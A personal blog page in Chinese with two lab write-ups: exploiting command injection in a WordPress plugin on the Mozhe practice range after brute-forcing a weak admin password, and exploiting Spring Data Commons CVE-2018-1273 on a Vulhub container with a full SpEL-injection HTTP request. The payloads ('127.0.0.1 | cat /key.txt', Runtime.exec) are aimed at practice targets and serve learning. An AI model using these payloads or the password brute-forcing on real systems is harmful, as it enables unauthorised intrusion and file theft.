
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0">
        <title>剣の魔王の小屋</title>
        <meta name="author" content="剣の魔王">
        <meta name="description" content="这个网站没有描述">
        <meta name="keywords" content="">
        <link rel="icon" href="image/head.png">
        <script src="https://cdn.staticfile.org/instant.page/5.1.0/instantpage.min.js" type="module"></script>
        <script src="https://cdn.staticfile.org/font-awesome/6.2.0/js/all.min.js"></script>
        
        <link rel="stylesheet" href="/css/fonts.min.css">
        <link rel="stylesheet" href="/css/particlex.css">
        
        <script src="https://cdn.staticfile.org/vue/3.2.33/vue.global.prod.min.js"></script>
    <meta name="generator" content="Hexo 5.4.2"></head>
    <body>
        <div id="loading" style="height:100vh;width:100vw;position:fixed;display:flex;z-index:2147483647;justify-content:space-between;background:#fff;transition:opacity 0.3s ease-out;-webkit-user-select:none;-moz-user-select:none;user-select:none"><div style="position:fixed;height:100vh;width:100vw;display:flex;justify-content:center;align-items:center"><div id="loadcontent" style="width:50vmin;height:50vmin;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px #a3ddfb;text-align:center"><div><h2>LOADING...</h2><p style="word-break:keep-all">加载过慢请开启缓存(浏览器默认开启)</p><div><img alt="loading" src="/loading.gif"></div></div></div></div></div>
        <div id="layout">
            <i data-fa-symbol="calendar-solid" class="fa-solid fa-calendar fa-fw"></i>
            <i data-fa-symbol="bookmark-solid" class="fa-solid fa-bookmark fa-fw"></i>
            <i data-fa-symbol="tags-solid" class="fa-solid fa-tags fa-fw"></i>
            <transition name="into">
                <div v-show="show_page" style="display: -not-none">
                    <div id="menu_show">
                         
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">剣の魔王の小屋</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;about</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;tags</span>
        </a>
        
    </div>
    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div class="curtain" @click="menu_show = !menu_show" v-show="menu_show"></div>
        <div :class="'title'" @click="menu_show = !menu_show">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;剣の魔王の小屋</span>
        </div>
        <transition name="slide">
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-house fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">home</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-id-card fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">about</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-box-archive fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">archives</div>
                </div>
            </a>
            
            <a href="/categories">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-bookmark fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">categories</div>
                </div>
            </a>
            
            <a href="/tags">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-tags fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">tags</div>
                </div>
            </a>
            
        </div>
        </transition>
    </div>
</nav>
                    </div>
                    <div id="main">
                        
<div class="article">
    <div>
        <h1> </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <svg class="fa-icon"><use xlink:href="#calendar-solid"></use></svg>
            </span>
            2023/10/5
        </span>
        
        
    </div>
    <div class="content" v-pre>
        <h1 id="WordPress远程命令执行漏洞-墨者靶场"><a href="#WordPress远程命令执行漏洞-墨者靶场" class="headerlink" title="WordPress远程命令执行漏洞-墨者靶场"></a>WordPress远程命令执行漏洞-墨者靶场</h1><p>墨者靶场链接：<a target="_blank" rel="noopener" href="https://www.mozhe.cn/bug/detail/Zis0bC9SUnlJZEtBdlZkT01QVXRsUT09bW96aGUmozhe">https://www.mozhe.cn/bug/detail/Zis0bC9SUnlJZEtBdlZkT01QVXRsUT09bW96aGUmozhe</a></p>
<p>下图是CMS漏洞发现的思维导图</p>
<p><strong><span id="more"></span></strong></p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231005-184356" alt="image:124571547"></p>
<p>打开靶场，在不知道CMS是什么的时候使用御剑指纹识别系统、whatweb或者在线潮汐指纹识别</p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231005-184943.png" alt="-1"></p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231005-185052.png" alt="0"></p>
<p>在知道是wordpress后可以使用wpscan或cmsscan扫描存在的漏洞，如下图，扫出了48个漏洞且每个漏洞下都有响应的漏洞利用链接</p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231005-190540.png" alt="8"></p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231005-190747.png" alt="9"></p>
<p>接下来就是漏洞利用，按照题目提示的是远程命令执行漏洞，且主页面没有什么有利用价值的东西，直接使用御剑</p>
<p>后台扫描或者kali自带的dirsearch扫描后台文件，尝试筛选或者每个都进去看看，最后发现/wp-login.php是后台登录界面，使用弱口令尝试破解admin默认账号的密码</p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231005-191005.png" alt="1"></p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231005-191159.png" alt="2"></p>
<p>根据bp返回的长度和响应包发现123qwe为正确密码，登录进后台</p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231005-191221.png" alt="3"></p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231005-191342.png" alt="4"></p>
<p>进入“Activity monitor”下的“Tools”，在“IP or integer *”框里输入“127.0.0.1 | ls /”实现远程命令执行目录查看，发现key.txt文件，之后使用“127.0.0.1 | cat /key.txt”得到flag</p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231005-191721.png" alt="5"></p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231005-191859.png" alt="6"></p>
<p>由于输入框有长度限制，所以直接改前端代码，将“maxlength”改大即可，或者直接在“value”里更改内容</p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231005-192101.png" alt="7"></p>
<h1 id="VulHub-Spring-Data-Commons-远程命令执行漏洞（CVE-2018-1273）"><a href="#VulHub-Spring-Data-Commons-远程命令执行漏洞（CVE-2018-1273）" class="headerlink" title="VulHub-Spring Data Commons 远程命令执行漏洞（CVE-2018-1273）"></a>VulHub-Spring Data Commons 远程命令执行漏洞（CVE-2018-1273）</h1><p>使用命令”docker-compose build”、“docker-compose up -d”打开靶场，命令“docker-compose config”查看配置</p>
<p>本地网站地址为<a target="_blank" rel="noopener" href="http://192.168.145.132:8080/%EF%BC%8C%E8%AE%BF%E9%97%AE">http://192.168.145.132:8080/，访问</a></p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231006-095045.png" alt="10"></p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231006-095058.png" alt="11"></p>
<p>使用dirsearch扫描网站得到/users目录并访问，是一个注册用户界面</p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231006-095210.png" alt="12"></p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231006-095236.png" alt="13"></p>
<p>抓包并把payload添加上去</p>
<pre><code>POST /users?page=&amp;size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&amp;size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName(&quot;java.lang.Runtime&quot;).getRuntime().exec(&quot;touch /tmp/success&quot;)]=&amp;password=&amp;repeatedPassword=
</code></pre>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231006-095429.png" alt="14"></p>
<p>之后执行”docker compose exec spring bash”进入容器中，可见成功创建””/tmp/success”说明命令执行成功：</p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231006-095546.png" alt="15"></p>
<p><img src="https://raw.githubusercontent.com/xqhff/picture/main/Img/20231006-095550.png" alt="16"></p>

    </div>
    
    
</div>
                         
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © 20xx - 2024 剣の魔王の小屋
            <span class="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            @剣の魔王
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> & <a
                target="_blank" rel="noopener" href="https://github.com/argvchs/hexo-theme-particlex">ParticleX Theme</a></div>
        
    </div>
</footer>
                    </div>
                </div>
            </transition>
            <div id="img_show">
                <img id="img_content" alt="img_show">
            </div>
			
			<!-- Mouse click special effects -->
			<canvas
    id="fireworks"
    style="position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; pointer-events: none; z-index: 32767"></canvas>
	<script src="https://s4.zstatic.net/ajax/libs/animejs/3.2.1/anime.min.js"></script>
	<script src="/js/fireworks.min.js"></script>
	
	<!-- Meteor background special effects-->
	<canvas
    id="background"
    style="position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; pointer-events: none; z-index: -1"></canvas>
	<script src="/js/background.min.js"></script>
	
	
        </div>
        <script src="https://cdn.staticfile.org/highlight.js/11.5.1/highlight.min.js"></script>
        <script src="/js/particlex.js"></script>
        <script src="/js/showimg.js"></script>
        

    </body>
</html>